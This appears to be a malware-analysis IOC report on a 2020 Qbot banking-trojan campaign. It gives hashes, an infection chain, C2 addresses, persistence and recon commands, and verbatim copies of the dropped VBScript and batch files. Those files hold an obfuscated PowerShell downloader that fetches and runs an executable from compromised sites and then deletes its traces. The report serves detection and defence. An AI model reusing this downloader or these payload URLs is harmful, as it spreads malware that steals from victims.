#Qbot_250820

#IOC #OptiData #VR #Qakbot_Qbot  #macros #WSH #opendir

https://pastebin.com/2EgQnFjW

previous_contact: n/a

FAQ:
https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/
https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

attack_vector
--------------
email attach .zip > DOC > macro > WSH > CMD > PowerShell > GET exe

email_headers
--------------
n/a

files
--------------
SHA-256		b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a
File name	08252020_365727360.zip	[ Zip archive data, at least v2.0 to extract ]
File size	321.84 KB (329568 bytes)

SHA-256		8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1
File name	08252020_365727360.doc	[ Office Open XML Document ]
File size	328.47 KB (336352 bytes)

SHA-256		1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf
File name	55555555.png		[ PE32 executable for MS Windows ]
File size	1.86 MB (1953776 bytes)

SHA-256		e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7
File name	ikaaazen.exe		[ PE32 executable for MS Windows ]
File size	1.86 MB (1953776 bytes)

activity
--------------
PL_SCR		rosemiracle.} com/smmafmjmmjpx/55555555.png	- 404
		ricari.com.} br/spdwacdphg/55555555.png		- 200
		fishlovingworld.} com/imbmgiqzrki/55555555.png	- 200
		styletadka.} in/fkvias/55555555.png		- 404
		test.bateaux-bois.} com/cgcxd/55555555.png	- 200
		lumanaridecorative.} com/vnmjevz/55555555.png	- 200
		kmbuzz.} com/tlrmuyrjc/55555555.png		- 200
		alfredoburguers.} cl/vhrizp/55555555.png	- 200
		teste4.filimartis.} com.} br/jdnpsysj/55555555.png - 200
		equitymm.} com/idlzuojgtfo/55555555.png		   - 404
		americanwardrobefitters.} com/xsgqcd/55555555.png  - 200
		onlyicon.} com/jbhmomji/55555555.png		   - 200

C2	[spx161]
213.67.45.195:2222
75.182.214.87:443
81.133.234.36:2222
199.116.241.147:443
75.136.40.155:443
72.204.242.138:443
94.52.160.116:443
151.73.112.220:443
71.126.139.251:443
98.173.34.212:995
41.34.91.244:995
103.238.231.40:443
47.153.115.154:995
104.221.4.11:2222
185.126.13.230:995
137.99.224.198:443
73.4.138.94:443
201.216.216.245:443
175.211.225.118:443
76.179.54.116:443
70.164.37.205:995
207.246.75.201:443
97.93.211.17:443
71.74.12.34:443
207.246.71.122:443
80.240.26.178:443
45.32.154.10:443
108.27.217.44:443
80.14.209.42:2222
207.255.161.8:993
207.255.161.8:995
84.117.176.32:443
87.255.83.83:443
154.56.69.231:443
108.28.179.42:995
191.84.11.252:443
69.26.23.143:2222
98.16.204.189:995
24.27.82.216:2222
184.89.71.68:443
199.247.16.80:443
86.191.145.103:2222
207.255.161.8:2078
66.30.92.147:443
115.21.224.117:443
63.155.28.199:995
47.146.32.175:443
24.37.178.158:443
69.11.247.242:443
165.120.230.108:2222
36.77.151.211:443
96.20.108.17:2222
73.228.1.246:443
76.170.77.99:995
174.30.165.242:2222
94.205.171.126:995
39.118.245.6:443
83.216.134.94:2222
118.160.161.124:443
45.47.65.191:443
67.165.206.193:993
93.151.180.170:61202
98.210.41.34:443
50.29.181.193:995
78.96.199.79:443
66.215.32.224:443
93.114.192.104:2222
86.98.89.189:2222
75.87.161.32:995
203.198.96.186:443
141.158.47.123:443
73.78.149.206:443
35.134.202.234:443
67.170.137.8:443
96.18.240.158:443
75.110.250.89:995
98.219.77.197:443
24.201.79.208:2078
96.227.127.13:443
65.131.104.249:995
70.164.39.91:443
98.121.187.78:443
209.137.209.163:995
178.87.28.63:443
78.100.229.44:61201
90.175.88.99:2222
74.56.167.31:443
206.51.202.106:50003
5.15.65.198:2222
71.84.5.114:995
65.96.36.157:443
47.44.217.98:443
72.190.101.70:443
92.99.249.199:443
217.165.164.57:2222
71.163.222.7:443
72.204.242.138:32102
72.204.242.138:50001
101.108.117.41:443
77.27.174.49:995
217.165.115.0:990
199.247.22.145:443
72.204.242.138:53
72.204.242.138:990
173.26.189.151:443
84.78.128.76:2222
47.206.174.82:443
189.157.196.112:995
39.36.101.208:995
193.248.44.2:2222
37.210.51.210:443
94.99.116.7:995
31.215.99.5:443
47.28.131.209:443
100.4.173.223:443
72.209.191.27:443
209.182.122.217:443
5.193.155.181:2078
103.110.49.88:443
12.5.37.3:995
216.163.4.132:443
72.66.47.70:443
59.124.10.133:443
96.19.117.140:443
24.205.42.241:443
172.78.30.215:443
71.80.66.107:443
197.165.161.55:995
45.32.155.12:443
45.77.215.141:443
68.190.152.98:443
80.195.103.146:2222
2.90.123.252:443
174.110.39.220:443
71.187.170.235:443
72.204.242.138:32100
49.191.3.189:443
142.129.227.86:443
67.209.195.198:443
2.90.53.174:995
95.77.223.148:443
41.228.4.27:443
188.25.162.27:443
130.25.130.19:2222
211.24.72.253:443
68.174.15.223:443
216.201.162.158:443
74.135.37.79:443
94.59.241.189:995

netwrk
--------------
[http]
216.21.13.115	ricari.com.br	GET /spdwacdphg/55555555.png (!) MZ !This program cannot be run in DOS mode.

comp
--------------
powershell.exe	2668	TCP	83.150.213.54	80	ESTABLISHED
powershell.exe	2668	TCP	216.21.13.115	80	ESTABLISHED

proc
--------------
C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
C:\Windows\SysWOW64\explorer.exe explorer.exe C:\ProgramData\re.vbs

{other context}

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\WScript.exe" "C:\ProgramData\re.vbs
	C:\Windows\System32\cmd.exe /c ""C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd" "
		C:\Windows\system32\taskkill.exe

		C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerShell  Foreach($url in @('http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png','http://onlyicon.com/jbhmomji/55555555.png')) { try{$path = 'C:\Ulohot\GretiodetGDFERT.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}

			C:\Ulohot\GretiodetGDFERT.exe
			C:\Ulohot\GretiodetGDFERT.exe /C
	C:\Windows\system32\timeout.exe  /T 10

{alternative run}

C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe /C
C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn omjbpoxjy /tr "\"C:\Ulohot\GretiodetGDFERT.exe\" /I omjbpoxjy" /SC ONCE /Z /ST 08:05 /ET 08:17
 "C:\Windows\system32\schtasks.exe" /create /tn {CB895919-CAFA-4089-9BC0-B5CAA5E6F386} /tr "\"C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe"" /sc HOURLY /mo 5 /F

{recon activiry}

command: whoami /all
command: cmd /c set
command: ipconfig /all
command: net view /all
command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
command: net share
command: route print
command: netstat -nao
command: net localgroup
command: qwinsta

persist
--------------
NT AUTHORITY\SYSTEM
C:\Ulohot\GretiodetGDFERT.exe

CB895919-CAFA-4089-9BC0-B5CAA5E6F386
C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*
C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe

drop
--------------
C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf
C:\ProgramData\re.vbs
C:\Ulohot\GretiodetGDFERT.exe
C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd
C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe

re.vbs
--------------
set GetyuwuiebejhwbjTYYIDTIFFGD=CreateObject("Scripting.FileSystemObject")
If Not GetyuwuiebejhwbjTYYIDTIFFGD.FolderExists("c:\Ulohot") Then
GetyuwuiebejhwbjTYYIDTIFFGD.CreateFolder ("c:\Ulohot")
End If

e13 = ("Taskkill /IM ""winword.exe"" /F")
a1 = ("POW^")a2 = ("erS^")a3 = ("hell ^")a4 = ("Forea^")a5 = ("ch($ur^")a6 = ("l in^")a7 = (" @('^")
a8 = ("http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png^")
a9 = ("','^")a10 = ("http://onlyicon.com/jbhmomji/55555555.png^")
a11 = ("')) { tr^")a12 = ("y{$pat^")a15 = ("h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^")
a16 = ("(Ne^")a17 = ("w-Obje^")a18 = ("ct Ne^")a19 = ("t.We^")a20 = ("bCli^")a21 = ("ent).Down^")
a22 = ("loadF^")a23 = ("ile(^")a24 = ("$ur^")a25 = ("l.ToSt^")a26 = ("ring^")b1 = ("(), $p^")
b2 = ("ath)^")b3 = (";sa^")b4 = ("ps $p^")b5 = ("ath; br^")b6 = ("eak;}c^")b7 = ("atc^")
b8 = ("h{wri^")b9 = ("te-ho^")b10 = ("st $_.E^")b11 = ("xcep^")b12 = ("tio^")b13 = ("n.Me^")
b14 = ("ssa^")b15 = ("ge}}")

Wait = ("TIMEOUT /T 10 & DEL C:\ProgramData\re.vbs & DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd & DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf")

Dim oShell : Set oShell = CreateObject("WScript.Shell")

WScript.Sleep 7000

oShell.Run "C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd", 0, 0
Set WshShell = Nothing

 'NorteDolk 'NorteDolk 'NorteDolk

POUITYRSDFuytrdFGHTYDFGBJN.cmd
--------------
    You're going to need to keep at least 8 of the src at the end of the string. You need to modify the input documentation page.

Taskkill /IM "winword.exe" /F

POW^erS^hell ^Forea^ch($ur^l in^ @('^
http://rosemiracle.com/smmafmjmmjpx/55555555.png','
http://ricari.com.br/spdwacdphg/55555555.png','
http://fishlovingworld.com/imbmgiqzrki/55555555.png','
http://styletadka.in/fkvias/55555555.png','
http://test.bateaux-bois.com/cgcxd/55555555.png','
http://lumanaridecorative.com/vnmjevz/55555555.png','
http://kmbuzz.com/tlrmuyrjc/55555555.png','
http://alfredoburguers.cl/vhrizp/55555555.png','
http://teste4.filimartis.com.br/jdnpsysj/55555555.png','
http://equitymm.com/idlzuojgtfo/55555555.png','
http://americanwardrobefitters.com/xsgqcd/55555555.png^
','^http://onlyicon.com/jbhmomji/55555555.png^'))
{ tr^y{$pat^h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^
(Ne^w-Obje^ct Ne^t.We^bCli^ent).Down^loadF^ile(^$ur^l.ToSt^ring^(), $p^ath)^;sa^ps $p^ath; br^eak;}
c^atc^h{wri^te-ho^st $_.E^xcep^tio^n.Me^ssa^ge}}

    You're going to need to keep at least 8 of the src at the end of the string. You need to modify the input documentation page.

TIMEOUT /T 10 &
DEL C:\ProgramData\re.vbs &
DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd &
DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf

# # #
https://www.virustotal.com/gui/file/b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a/details
https://www.virustotal.com/gui/file/8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1/details
https://www.virustotal.com/gui/file/1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf/details
https://www.virustotal.com/gui/file/e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7/details

https://analyze.intezer.com/analyses/2638bd19-de0a-4ce7-b7cf-da19052d14e0
https://analyze.intezer.com/analyses/6eb14337-f3b1-46da-aeed-c7c01b528f1d

VR